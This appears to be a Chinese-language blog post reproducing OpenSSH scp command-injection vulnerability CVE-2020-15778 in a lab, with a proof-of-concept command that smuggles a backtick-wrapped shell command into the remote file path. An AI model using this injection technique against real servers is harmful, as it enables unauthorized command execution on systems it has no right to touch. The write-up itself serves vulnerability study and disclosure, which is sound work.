温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

OpenSSH命令注入漏洞CVE-2020-15778该如何分析

发布时间:2021-12-28 17:19:27 来源:亿速云 阅读:182 作者:柒染 栏目:安全技术

OpenSSH命令注入漏洞CVE-2020-15778该如何分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

漏洞介绍

SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。
OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾,可以触发命令注入漏洞。
攻击者可以采用反引号(`)文件作为命令注入执行scp命令,命令将会发送到远程服务器并执行。

影响版本
version: <=openssh-8.3p1

复现环境

攻击机:192.168.20.101
靶机:192.168.20.102
利用场景:已知 ssh 密码为 docker

漏洞复现:

scp cve202015778.txt docker@192.168.20.102:'`touch /tmp/cve202015778.sh`tmp'

#touch /tmp/cve202015778.sh`tmp' 单引号包裹全路径信息
#touch /tmp/cve202015778.sh` 反引号包裹要执行的命令
#中途需要身份验证,需要输入对应用户的密码

OpenSSH命令注入漏洞CVE-2020-15778该如何分析

靶机查看信息

OpenSSH命令注入漏洞CVE-2020-15778该如何分析

关于 OpenSSH命令注入漏洞CVE-2020-15778该如何分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI